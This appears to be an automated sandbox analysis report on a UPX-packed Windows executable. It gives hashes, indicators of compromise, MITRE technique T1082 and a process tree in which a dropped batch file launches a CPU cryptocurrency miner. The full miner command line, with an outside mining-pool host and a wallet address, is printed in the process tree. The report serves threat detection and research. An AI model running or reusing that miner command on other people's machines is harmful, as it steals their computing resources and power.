73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
300s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
17/02/2024, 13:01

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
588	b2e.exe
1152	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1152	cpuminer-sse2.exe
1152	cpuminer-sse2.exe
1152	cpuminer-sse2.exe
1152	cpuminer-sse2.exe
1152	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/212-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 212 wrote to memory of 588	212	batexe.exe	74
PID 212 wrote to memory of 588	212	batexe.exe	74
PID 212 wrote to memory of 588	212	batexe.exe	74
PID 588 wrote to memory of 980	588	b2e.exe	77
PID 588 wrote to memory of 980	588	b2e.exe	77
PID 588 wrote to memory of 980	588	b2e.exe	77
PID 980 wrote to memory of 1152	980	cmd.exe	78
PID 980 wrote to memory of 1152	980	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:212
- C:\Users\Admin\AppData\Local\Temp\BB70.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\BB70.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\BB70.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BD55.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:980
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\BB70.tmp\b2e.exe

Filesize
463KB

MD5
b7a88669478d50f3b9efb6b29fdc9a32

SHA1
9f2418308888b6ef201ca02d4a4b33a5d93dce19

SHA256
ba49746d48505a3074ab2897dce6149e870c1a8ba30860c4935305d2d82055e3

SHA512
4ee73506bc491cb3d569140119b812fce60291fdf762a83b14b0ada9f98e3090549844f47176a4a83ab8e1ef07c5916055dd7399f98ee74d79691e214978521f

Download Submit
C:\Users\Admin\AppData\Local\Temp\BB70.tmp\b2e.exe

Filesize
396KB

MD5
8973ef1ba593ced169ef30238deed297

SHA1
2d72f342883f584f074ddc4347ff4cbc67b60ed6

SHA256
9320a1dc8dd4eacfdb59b0ec3d50e83c9c5356481c54d2af08d4d02e8667928a

SHA512
22e89009a288118ff80e0aa80863506ca3a8a580aac3bea9b69d07bab6bfb52fcededa7e080f5f1b8b7c4b33bd9e8776c19fc0fd3d8f5abdc13bb9bac9b43f8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\BD55.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
20KB

MD5
cf0c5d452529e0a35904c48a62084f50

SHA1
33db28fb1d67264438d250aebdbf068f4cb16ba0

SHA256
1af0f33ab2c260923cb4779cbb490ab00b6eda9cc44086c1ca3b9c3ce284fa64

SHA512
a895f5205190b3c6a34720c0573f27f2ab29c0c410543d863736f4ac770f90abfb9cc0a591de087e4531138264af6f67e25f73ce8e801ab7211e37f5b2a2f533

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
5KB

MD5
0ad907675030b8e8fd4cab970395ff07

SHA1
f929f1a3f8a3196134fafba0ea50142a3d3980ff

SHA256
48ab32fc9fd819b6fa6b7774045e7ecbf1da23719a23955542f28004ba9db2bb

SHA512
dea9c055479267dd0575d0082f471cb2000a91cf72063bfbe1b97461df76fc5b05d52d651c7ce2045cc58bcaeeea48b4b2fa31d1d43858e021676b4d0cf0b6c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
373KB

MD5
53118554bad710f8d3913c00af783012

SHA1
35a7edcb5d3cb0b4a85fc82a032eaaef3f32abec

SHA256
29335bf15bd6c5f8ec9d5bf17206724419a21ceff711c39f2e30bd9ff69908e6

SHA512
eb05c2536a97e566095a32d010b079f45e4cd85401a28829f48658f45c221289730172d5ff6bcae77b6773cdb0281b2df3bbaf642a68fab8b65b0f3bb700d23a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
391KB

MD5
9e47223b961fd52f5eb95533937f0ebb

SHA1
15afd997fe469e72183caf1694f8cd6e5991cf02

SHA256
d34920ad4ce20cc0e11c08a31cf0debcb8a26368d65f664b428e7af504e140bd

SHA512
bd6bd643b114b2eae232a737ce3c076e02ac63aa41b1cafc1556a475370bb4c87978529ee01221f5f8b2ced166324f424cf6f6b986e1a2297b578ff2393728ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
374KB

MD5
a4b91163d32727cdf998fa74cef9fb2b

SHA1
e0583369f45aab3522f6cdedbe9772f2713ceb16

SHA256
420b0a7877e131a29ac94a8382b2ddb794ff26e02a7b1f03cc9643e185d0060b

SHA512
2cd3c7836144c03b3173791f68a26e846bc470322fca4d3ced24087d5e764f90ec7cdbb440886aef634a16d90977b03cec31eac736331bf67abfe5f5831063b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
394KB

MD5
66117461ee3a6c90932f39cdb059d3a7

SHA1
09ac3a9f5eacc7871bb59b1aee0c57794c045147

SHA256
224780dd0b633c89e03c603d3d9775aa052d7a299aecf26c7ab23ffc9c0b85be

SHA512
7bca4b8d07fe6f28f546ef13dc9bc4597eed29d240bcd8806aac5e00854dc75ad639aa4a459e08882a93f51de7b27b358ffe1a44919be9ed7cec8e980e31853d

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
412KB

MD5
3b37338160fade6173c882f775ae6c29

SHA1
18d48aaaf6326b338b354f8eb968791f2409ed30

SHA256
159f2ad6180202150063fc5666ff3301532d243b9d03c5ea75d926c345e22138

SHA512
227cd46a8084c7172db1feccef6a24118b895eb9fac81a9c18b703ff32789f408c343c493096624574dfb00ee2c2046cbb2176ff559c3b5328d5ee5b1e591912

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
460KB

MD5
f21be956e8da5dca7a10323024c57be4

SHA1
ecf3daeb0285ce6c8ca6a26eba24712c2f38d40a

SHA256
1a496641682098675e410da151fd9dd562a9050872cf1b529b4e0c6b49bb7699

SHA512
d427ab4502f8b57e5b444fabd4faf99dc872b2fd652a7266e2f418703422b72988a8ba0d1d1015ad3019a9177cca879da2119bc8d8555184c34180cd5d4cb568

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
358KB

MD5
dcb1158acc9d910b7fc7fd14e422ea01

SHA1
6d0d03ee5e61c030f6d8ba3a372349586079d85d

SHA256
de009e0a43ba3de3ea3731b995278a9c6085e7cac2816aa462c72da31a71ad6e

SHA512
3d8d2381044e1b4a3d8895bc3878d2201425618c43b1b385933a6babcc62b83bedf24db0063ac0de19d31d277cb6b90bce9cb763e2eacfba0e44dc6afc4090a0

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
308KB

MD5
fb668034e0fd9bc552c2b3963c28b732

SHA1
e3c49183a4aff3bbca0e47fbb7fe350a507fb1a2

SHA256
336c06ba0413de1d030fd7f58d552de9ba9a59ce8c5d221f8e0edb4182770cff

SHA512
81aa057a0ec95dda74fe2de158675304da1d20ab4275fdbf8cda14fe9af5f022da6752a25d0469a9c725a88814ec8fd964f582d6b2ab6bc87a3685594e59b312

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
324KB

MD5
7871b9f880612d27b4370fa91640719e

SHA1
4b9c9878522604cd3d8b3f2f3b15d81c7012c958

SHA256
a103d5f43cf91fccac7abfd0ab664b8a8902fbdb9ed381cc2a68054b9587d6ec

SHA512
ebdb32b7b4775995aa808e37402345431e511e0c5a0017fc46b9f184bc618ab1f9d861d95a98c549a384d9594f59ba337e3e3afd82e30ff40044f1c360d23747

Download Submit
memory/212-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/588-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/588-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1152-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-43-0x0000000073DA0000-0x0000000073E38000-memory.dmp

Filesize
608KB

Download
memory/1152-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1152-44-0x0000000001160000-0x0000000002A15000-memory.dmp

Filesize
24.7MB

Download
memory/1152-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1152-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download